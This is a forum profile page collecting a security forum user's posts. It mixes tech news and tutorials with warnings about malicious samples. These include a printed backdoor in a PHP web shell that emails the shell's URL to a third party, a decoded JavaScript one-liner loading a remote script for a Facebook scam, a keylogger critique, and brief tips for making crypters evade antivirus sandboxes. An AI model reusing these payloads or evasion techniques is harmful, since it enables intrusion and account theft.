-
Posts
18772 -
Joined
-
Last visited
-
Days Won
729
Everything posted by Nytro
-
Probabil e magicul j1c0. Cred ca ai venit aici numai la caterinca si nu cred ca vei rezista mult cat sunt eu prin preajma.
-
Windows 8: Advanced Task Manager-ul dezvaluit de Bianca Dinu | 21 aprilie 2011 Ultimul build al lui Windows 8, aflat in mainile dezvoltatorilor a condus la aparitia unei noi serii de screenshot-uri, care ne dezvaluie de data aceasta noul Advanced Task Manager al sistemului de operare. Cele doua screenshot-uri par sa evidentieze doua tipuri diferite de manager, unul optimizat pentru editia touch, iar celalalt standard. Prima imagine dezvaluie dashboard-ul aplicatiei, care le ofera utilizatorilor mult mai multe informatii despre procesele care ruleaza, serviciile si resursele sistemului. Procesele sunt listate acum intr-o interfata colorata, care ii va permite utilizatorului sa vada care dintre ele incarca cel mai mult sistemul. Al doilea screenshot reprezinta o alta versiune a Task Manager-ului, cu un puternic accent touch-friendly, care prezinta o lista de programe, utilizatori si itemi start-up. Ultimele screenshot-uri Windows 8 vin sa completeze o serie lunga de leak-uri, care au dezvaluit fanilor cateva feature-uri esentiale ale platformei. Si cum mai sunt inca multe de aflat, stay tuned pentru noi detalii Windows 8. Sursa: http://www.hit.ro/software/Windows-8-Advanced-Task-Manager-ul-dezvaluit
-
Fisierul din acea arhiva incepe asa: <?php # Web Shell by oRb $eu=1; while ($eu==1){ $url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; mail ("yo_cristy_lov3_boy@yahoo.com","shell",$url); $eu++; } Adica (lasand stupiditatea acelui while) trimite un mai cu link-ul shell-ului astuia: yo_cristy_lov3_boy Adica nu mie ci unui cocalar. PS: Sunt total impotriva spamului.
-
Daca nu prea stii VB cum ai de gand sa modifici codul existent? Sunt diverse moduri de a face un crypter nedetectabil: modul in care sunt apelate API-urile necesare rularii executabilului in memorie, clasic sau dinamic. La dinamic poti sa cryptezi numele functiilor apelate, dar nu ajuta prea mult. Se poate adauga cod inutil pentru a evita anumite semnaturi pentru anumite zone de cod. Se poate pune o mica intarziere la executia programului pentru a scapa de sandboxu antivirusilor. Sunt multe lucruri de care trebuie tinut cont, si nu e deloc usor.
-
Bancuri Un roman a spart serverele Agentiei Spatiale Europene. In timp ce facea curat le-a lovit cu coada maturii. Pe o pagina de Facebook.
-
Reverse Code Engineering: An In-Depth Analysis of the Bagle Virus Author: Konstantin Rozinov 1. INTRODUCTION.......................................................................................................................3 2. BASIC X86 CONCEPTS................................................................................................................3 2.1. REGISTERS......................................................................................................................4 2.2. ASSEMBLY.......................................................................................................................5 2.3. RUNTIME DATA STRUCTURES..................................................................................................7 2.4. THE STACK......................................................................................................................9 3. VIRUS OVERVIEW...................................................................................................................12 3.1. VIRUS HISTORY...............................................................................................................12 3.2. VIRUS TYPES..................................................................................................................12 4. BAGLE VIRUS DISASSEMBLY.......................................................................................................13 4.1. OVERVIEW.....................................................................................................................13 4.2. ANALYSIS RESOURCES.......................................................................................................14 4.3. DISASSEMBLY APPROACH....................................................................................................16 4.4. ANALYSIS PROBLEMS AND SOLUTIONS.....................................................................................19 4.5. FUNCTIONAL FLOW...........................................................................................................22 5. CONCLUSIONS......................................................................................................................26 APPENDIX A: DETAILED DISASSEMBLY OF BAGLE VIRUS.............................................................................29 APPENDIX B: SOURCE CODE LISTING OF BAGLE VIRUS...............................................................................72 Download: http://www.binary-auditing.com/downloads/011%20-%20malware%20analysis/3%20Bagle%20A%20Virus/bagle_analysis_v.1.0.pdf
- 1 reply
-
- 1
-
-
Go Null Yourself E-Zine #4 0x01 Introduction 0x02 Feedback + Edits 0x03 Lattice-Based Cryptography rattle 0x04 duper's Code Corner duper 0x05 The Tech Behind Credit Cards K141 0x06 Brief Notes on Kiosk Hacking storm 0x07 Linux Rootkit Dev Update duper 0x08 MapReduce, Part 2 elchupathingy 0x09 Cameras + DVRs Scan storm 0x0a 303-833-00xx Scan Shadytel, Inc 0x0b bit.ly Shenanigans Silks, elchupa 0x0c Programming Challenge storm 0x0d The Scoop on LIGATT 0x0e Et Cetera, Etc. teh crew Download: http://www.exploit-db.com/papers/17184/
-
European Space Agency – Full Disclosure realizat de Tinkode într-o zi cu semnifica?ie în domeniu ESA.INT, pagina oficial? a Agen?iei Spa?iale Europene, are probleme de securitate, probleme ce au fost eviden?iate de Tinkode, unul dintre cei mai mediatiza?i români care se ocup? de publicarea datelor confiden?iale pentru accesarea paginilor web ale unora dintre cele mai mari nume ale industriei IT ?i nu numai. Accesul ob?inut de acesta i-a permis s? extrag? conturi de editori, administratori, FTP ?amd. Nimic impresionant pân? aici, având în vedere activitatea sa din ultima perioad?. Întâmplarea face ca ieri, 17 aprilie, a fost ziua în care este s?rb?torit? reîntoarcerea lui Apollo 13 pe p?mânt dintr-o misiune. Dac? nu era suficient asta, acesta a publicat datele de autentificare ale exact 13 conturi de FTP ce ne duce cu gândul la o misiune ce a avut o ?int? clar?. Din nou, presa vuie?te ?i atât. Mai multe detalii pe blogul s?u. Sursa: http://www.worldit.info/noutati/european-space-agency-full-disclosure-realizat-de-tinkode-intr-o-zi-cu-semnificatie-in-domeniu/ Softpedia: http://news.softpedia.com/news/European-Space-Agency-Website-Hacked-195487.shtml
-
Contine resurse: - SQLite (asta nu sunt sigur daca e DLL sau EXE) - XMLite (extended module) - un DLL pentru sunete cred, BASS nu stiu cum In plus: "FileDescription", "iStealer" "FileVersion", "6, 1, 0, 0" Deci nu e 6.3. Asadar, nu sunt sigur ca e curat.
-
Hackers Wanted File name: Hackers Wanted [unreleased Director's Cut].avi File description: Hackers Wanted File size: 699.08 MB Download: http://www.megaupload.com/?d=ZF1MXDFT Megavideo: http://www.megavideo.com/?d=ZF1MXDFT Tocmai l-am vazut, e foarte interesant. Descrie bine termenii de hacker (blackhat, whitehat, grayhat) in sensuri la care probabil nu va ganditi. Sunt multe lucruri interesante, vi-l recomand. Singura problema e ca nu are subtitrare, dar ar trebui sa va descurcati cu engleza.
-
Sper ca ai o explicatie buna. E un server de Radmin v2.1 in arhiva SFX.
-
Funtioneaza doar pe messenger 8.0. Doar multi-messenger merge pe versiunile mai noi. Deci nu cred ca e prea util.
-
Sa fie asta cel mai interesant tutorial pe care il puteti gasi aici? Sau preferati sa nu va ridicati deloc nivelul cunostintelor cu ceva, sa zicem, mai "complex"?
-
Trebuia sa te astepti la astfel de replici cand ai postat.
-
Probabil. Adica nu stiu cum s-ar putea face un program cu suport pentru toate tastaturile posibile, dar probabil nu e deloc usor. Dar cred ca e de ajuns unul care suporta tastaturile "standard".
-
Ai un "eval" acolo, care apeleaza o functie de decryptare. Functia decrypteaza totul, si returneaza rezultatul pentru a fi evaluat. Un simplu "document.write" sau un "alert" in loc de acel return e de ajuns pentru a vedea rezultatul si pentru a nu fi rulat. Dar link-ul e catre un JS mai complex si cu care am avut probleme, cred ca a fost prost scris. Daca nu o sa am ce face o sa incerc sa vad ce face, dar e ceva cod si imi e lene. Ideea de baza cu Facebook e urmatoare: pui fraieru sa ruleze cod JavaScript, poti face pe Facebook-ul lui cam tot ce ar putea face el, in afara doar de chestiile "sociale" ca: recunoaste persoana "x" sau coduri CAPTCHA sau cine stie ce altceva ce necesita o urma de inteligenta.
-
if(GetAsyncKeyState(i)&1 ==1) Nu are keyboard hook, va consuma ceva procesor, foloseste metoda clasica: verifica pentru fiecare tasta in parte daca e apasata, nu seteaza un hook pentru a primi o "notificare" in caz ca e apelata o tasta. Si e cam prost scris. Adica e stupid sa scrii un fisier ".reg" pentru a scrie in Registry cand exista Registry API, si de asemenea, sa uploadezi pe FTP cu un fisier ".bat" cand exista Winsock si protocolul FTP e tot stupid. Dar na, e mult mai usor asa de aceea probabil au fost preferate aceste alternative. Ideea principala e ca nu vi-l recomand, nici sa il folositi, si sa il studiati nici nu se pune problema.
-
How Graphics Cards Work Introduction to How Graphics Cards Work The images you see on your monitor are made of tiny dots called pixels. At most common resolution settings, a screen displays over a million pixels, and the computer has to decide what to do with every one in order to create an image. To do this, it needs a translator -- something to take binary data from the CPU and turn it into a picture you can see. Unless a computer has graphics capability built into the motherboard, that translation takes place on the graphics card. A graphics card's job is complex, but its principles and components are easy to understand. In this article, we will look at the basic parts of a video card and what they do. We'll also examine the factors that work together to make a fast, efficient graphics card. Think of a computer as a company with its own art department. When people in the company want a piece of artwork, they send a request to the art department. The art department decides how to create the image and then puts it on paper. The end result is that someone's idea becomes an actual, viewable picture. A graphics card works along the same principles. The CPU, working in conjunction with software applications, sends information about the image to the graphics card. The graphics card decides how to use the pixels on the screen to create the image. It then sends that information to the monitor through a cable. * Creating an image out of binary data is a demanding process. To make a 3-D image, the graphics card first creates a wire frame out of straight lines. Then, it rasterizes the image (fills in the remaining pixels). It also adds lighting, texture and color. For fast-paced games, the computer has to go through this process about sixty times per second. Without a graphics card to perform the necessary calculations, the workload would be too much for the computer to handle. The graphics card accomplishes this task using four main components: A motherboard connection for data and power A processor to decide what to do with each pixel on the screen Memory to hold information about each pixel and to temporarily store completed pictures A monitor connection so you can see the final result Next, we'll look at the processor and memory in more detail. http://videos.howstuffworks.com/labrats-tv/2816-episode-47-upgrade-your-video-card-video.htm#mkcpgn=snag1 The GPU Like a motherboard, a graphics card is a printed circuit board that houses a processor and RAM. It also has an input/output system (BIOS) chip, which stores the card's settings and performs diagnostics on the memory, input and output at startup. A graphics card's processor, called a graphics processing unit (GPU), is similar to a computer's CPU. A GPU, however, is designed specifically for performing the complex mathematical and geometric calculations that are necessary for graphics rendering. Some of the fastest GPUs have more transistors than the average CPU. A GPU produces a lot of heat, so it is usually located under a heat sink or a fan. In addition to its processing power, a GPU uses special programming to help it analyze and use data. ATI and nVidia produce the vast majority of GPUs on the market, and both companies have developed their own enhancements for GPU performance. To improve image quality, the processors use: Full scene anti aliasing (FSAA), which smoothes the edges of 3-D objects Anisotropic filtering (AF), which makes images look crisper * Each company has also developed specific techniques to help the GPU apply colors, shading, textures and patterns. The Evolution of Graphics Cards Graphics cards have come a long way since IBM introduced the first one in 1981. Called a Monochrome Display Adapter (MDA), the card provided text-only displays of green or white text on a black screen. Now, the minimum standard for new video cards is Video Graphics Array (VGA), which allows 256 colors. With high-performance standards like Quantum Extended Graphics Array (QXGA), video cards can display millions of colors at resolutions of up to 2040 x 1536 pixels.* * As the GPU creates images, it needs somewhere to hold information and completed pictures. It uses the card's RAM for this purpose, storing data about each pixel, its color and its location on the screen. Part of the RAM can also act as a frame buffer, meaning that it holds completed images until it is time to display them. Typically, video RAM operates at very high speeds and is dual ported, meaning that the system can read from it and write to it at the same time. * The RAM connects directly to the digital-to-analog converter, called the DAC. This converter, also called the RAMDAC, translates the image into an analog signal that the monitor can use. Some cards have multiple RAMDACs, which can improve performance and support more than one monitor. You can learn more about this process in How Analog and Digital Recording Works. The RAMDAC sends the final picture to the monitor through a cable. We'll look at this connection and other interfaces in the next section. PCI Connection Graphics cards connect to the computer through the motherboard. The motherboard supplies power to the card and lets it communicate with the CPU. Newer graphics cards often require more power than the motherboard can provide, so they also have a direct connection to the computer's power supply. Connections to the motherboard are usually through one of three interfaces: Peripheral component interconnect (PCI) Advanced graphics port (AGP) PCI Express (PCIe) PCI Express is the newest of the three and provides the fastest transfer rates between the graphics card and the motherboard. PCIe also supports the use of two graphics cards in the same computer. Most graphics cards have two monitor connections. Often, one is a DVI connector, which supports LCD screens, and the other is a VGA connector, which supports CRT screens. Some graphics cards have two DVI connectors instead. But that doesn't rule out using a CRT screen; CRT screens can connect to DVI ports through an adapter. At one time, Apple made monitors that used the proprietary Apple Display Connector (ADC). Although these monitors are still in use, new Apple monitors use a DVI connection. Most people use only one of their two monitor connections. People who need to use two monitors can purchase a graphics card with dual head capability, which splits the display between the two screens. A computer with two dual head, PCIe-enabled video cards could theoretically support four monitors. In addition to connections for the motherboard and monitor, some graphics cards have connections for: TV display: TV-out or S-video Analog video cameras: ViVo or video in/video out Digital cameras: FireWire or USB Some cards also incorporate TV tuners. Next, we'll look at how to choose a good graphics card. DirectX and Open GL DirectX and Open GL are application programming interfaces, or APIs. An API helps hardware and software communicate more efficiently by providing instructions for complex tasks, like 3-D rendering. Developers optimize graphics-intensive games for specific APIs. This is why the newest games often require updated versions of DirectX or Open GL to work correctly. APIs are different from drivers, which are programs that allow hardware to communicate with a computer's operating system. But as with updated APIs, updated device drivers can help programs run correctly.* Choosing a Good Graphics Card A top-of-the-line graphics card is easy to spot. It has lots of memory and a fast processor. Often, it's also more visually appealing than anything else that's intended to go inside a computer's case. Lots of high-performance video cards are illustrated or have decorative fans or heat sinks. But a high-end card provides more power than most people really need. People who use their computers primarily for e-mail, word processing or Web surfing can find all the necessary graphics support on a motherboard with integrated graphics. A mid-range card is sufficient for most casual gamers. People who need the power of a high-end card include gaming enthusiasts and people who do lots of 3-D graphic work. A good overall measurement of a card's performance is its frame rate, measured in frames per second (FPS). The frame rate describes how many complete images the card can display per second. The human eye can process about 25 frames every second, but fast-action games require a frame rate of at least 60 FPS to provide smooth animation and scrolling. Components of the frame rate are: Triangles or vertices per second: 3-D images are made of triangles, or polygons. This measurement describes how quickly the GPU can calculate the whole polygon or the vertices that define it. In general, it describes how quickly the card builds a wire frame image. Pixel fill rate: This measurement describes how many pixels the GPU can process in a second, which translates to how quickly it can rasterize the image. The graphics card's hardware directly affects its speed. These are the hardware specifications that most affect the card's speed and the units in which they are measured: GPU clock speed (MHz) Size of the memory bus (bits) Amount of available memory (MB) Memory clock rate (MHz) Memory bandwidth (GB/s) RAMDAC speed (MHz) * The computer's CPU and motherboard also play a part, since a very fast graphics card can't compensate for a motherboard's inability to deliver data quickly. Similarly, the card's connection to the motherboard and the speed at which it can get instructions from the CPU affect its performance. Overclocking Some people choose to improve their graphics card's performance by manually setting their clock speed to a higher rate, known as overclockings. People usually overclock their memory, since overclocking the GPU can lead to overheating. While overclocking can lead to better performance, it also voids the manufacturer's warranty. Sursa: http://computer.howstuffworks.com/graphics-card.htm
-
(a=(b=document).createElement('script')).src='//thefbsecret.info/jsp.php',b.body.appendChild(a);void(0) L-am "decodat" in 10 secunde. Trebuie doar sa ai imaginatie...
-
Pinguy OS What Is Pinguy OS? Ubuntu is a great OS and undoubtedly the most popular and easiest Linux based Distro to use but even with its default setup and chosen programs it's still lacking functionality and ease of use for most new users. So what I decided to do was build a Distro that looks good, could do everything most user would ever want to do and that was very simple to use. I started out by listening to what my friends and family wanted to use their PC for and found the most user friendly programs for the task they wanted to do. After a while I got a good idea what most people use their PC for and what programs were the easiest to use. Like using Shotwell for easily uploading images to Facebook, gtkpod for putting music, photos and video on a ipod/iphone and mvPod for converting the video to a iPod friendly format. So all the programs in Pinguy OS have been chosen because of their ease of use and functionality, I also changed every file type to open with the right program, like for some reason by default .iso are opened with Archive Manager so I changed that to Brasero Disc Burner. As I already said apart from it being easy to use I also wanted it to be a very good looking operating system. There are now a lot of programs out there for Linux to give the OS a very smart and polished implementation, like CoverGloobus, Gloobus Preview, GNOME Do, and Docky. These programs don't just give the OS a good look and feel but they are also very useful and handy. Pinguy OS is an optimise build of Ubuntu 10.10 Minimal CD with added repositories, tweaks and enhancements that can run as a Live DVD or be installed. It has all the added packages needed for video, music and web content e.g. flash and java, plus a few fixes as well. Like fixing the wireless problems, gwibber’s Facebook problem and flash videos in full-screen. Everything is set-up for samba, all you need to do is right click a folder you want to share and add a password in samba using system-config-samba. It also has a UPnP/DLNA server (pms-linux) so you can share your music, video’s etc. With a PS3, XBOX 360, Smart Phones or any other UPnP/DLNA media reader. Nautilus has been replaced for Elementary-Nautilus with added plug-ins so it can get music and video art from the web. The default theme is Elementary using ttf-droid font with Docky and a custom Conky. I have also added DVB support to Totem for anyone with a TV card that wants to watch tv on their PC but doesn't want to install a dedicated program like myth-tv. For a full list of installed programs and repos for 10.04.1 *OLD* download this file. If you prefer to download and install the LTS (long term support) 10.04. It can still be downloaded from here. Download: 32-Bit: https://sourceforge.net/projects/pinguy-os/files/Pinguy_OS_10.10/Pinguy_OS_10.10.1_i686.iso/download http://pinguy-os.sourceforge.net/torrents/Pinguy_OS_10.10.1_i686_%5B32-Bit%5D.torrent 64-Bit: https://sourceforge.net/projects/pinguy-os/files/Pinguy_OS_10.10/Pinguy_OS_10.10.1_x86-64.iso/download http://pinguy-os.sourceforge.net/torrents/Pinguy_OS_10.10.1_x86-64_%5B64-Bit%5D.torrent If you like this Distro and would like to help it improve and grow you can always donate, it doesn't matter how small the amount is, it all helps. Homepage: http://www.pinguyos.com/
-
ldkngNGPQEBAP Ca sa mai cititi o data.
-
Da, ai dreptate. Pfff, nu mai stiu sa fac o inmultire Da, oricum nu cred ca va folosi cineva aceasta clasa pentru numere extraordinar de mari, dar ar fi bun ca exercitiu de programare.
-
Linux Directory Structure (File System Structure) Explained with Examples Have you wondered why certain programs are located under /bin, or /sbin, or /usr/bin, or /usr/sbin? For example, less command is located under /usr/bin directory. Why not /bin, or /sbin, or /usr/sbin? What is the different between all these directories? In this article, let us review the Linux filesystem structures and understand the meaning of individual high-level directories. 1. / – Root Every single file and directory starts from the root directory. Only root user has write privilege under this directory. Please note that /root is root user’s home directory, which is not same as /. 2. /bin – User Binaries Contains binary executables. Common linux commands you need to use in single-user modes are located under this directory. Commands used by all the users of the system are located here. For example: ps, ls, ping, grep, cp. 3. /sbin – System Binaries Just like /bin, /sbin also contains binary executables. But, the linux commands located under this directory are used typically by system aministrator, for system maintenance purpose. For example: iptables, reboot, fdisk, ifconfig, swapon 4. /etc – Configuration Files Contains configuration files required by all programs. This also contains startup and shutdown shell scripts used to start/stop individual programs. For example: /etc/resolv.conf, /etc/logrotate.conf 5. /dev – Device Files Contains device files. These include terminal devices, usb, or any device attached to the system. For example: /dev/tty1, /dev/usbmon0 6. /proc – Process Information Contains information about system process. This is a pseudo filesystem contains information about running process. For example: /proc/{pid} directory contains information about the process with that particular pid. This is a virtual filesystem with text information about system resources. For example: /proc/uptime 7. /var – Variable Files var stands for variable files. Content of the files that are expected to grow can be found under this directory. This includes — system log files (/var/log); packages and database files (/var/lib); emails (/var/mail); print queues (/var/spool); lock files (/var/lock); temp files needed across reboots (/var/tmp); 8. /tmp – Temporary Files Directory that contains temporary files created by system and users. Files under this directory are deleted when system is rebooted. 9. /usr – User Programs Contains binaries, libraries, documentation, and source-code for second level programs. /usr/bin contains binary files for user programs. If you can’t find a user binary under /bin, look under /usr/bin. For example: at, awk, cc, less, scp /usr/sbin contains binary files for system administrators. If you can’t find a system binary under /sbin, look under /usr/sbin. For example: atd, cron, sshd, useradd, userdel /usr/lib contains libraries for /usr/bin and /usr/sbin /usr/local contains users programs that you install from source. For example, when you install apache from source, it goes under /usr/local/apache2 10. /home – Home Directories Home directories for all users to store their personal files. For example: /home/john, /home/nikita 11. /boot – Boot Loader Files Contains boot loader related files. Kernel initrd, vmlinux, grub files are located under /boot For example: initrd.img-2.6.32-24-generic, vmlinuz-2.6.32-24-generic 12. /lib – System Libraries Contains library files that supports the binaries located under /bin and /sbin Library filenames are either ld* or lib*.so.* For example: ld-2.11.1.so, libncurses.so.5.7 13. /opt – Optional add-on Applications opt stands for optional. Contains add-on applications from individual vendors. add-on applications should be installed under either /opt/ or /opt/ sub-directory. 14. /mnt – Mount Directory Temporary mount directory where sysadmins can mount filesystems. 15. /media – Removable Media Devices Temporary mount directory for removable devices. For examples, /media/cdrom for CD-ROM; /media/floppy for floppy drives; /media/cdrecorder for CD writer 16. /srv – Service Data srv stands for service. Contains server specific services related data. For example, /srv/cvs contains CVS related data. Sursa: http://www.thegeekstuff.com/2010/09/linux-file-system-structure/
-
- 1
-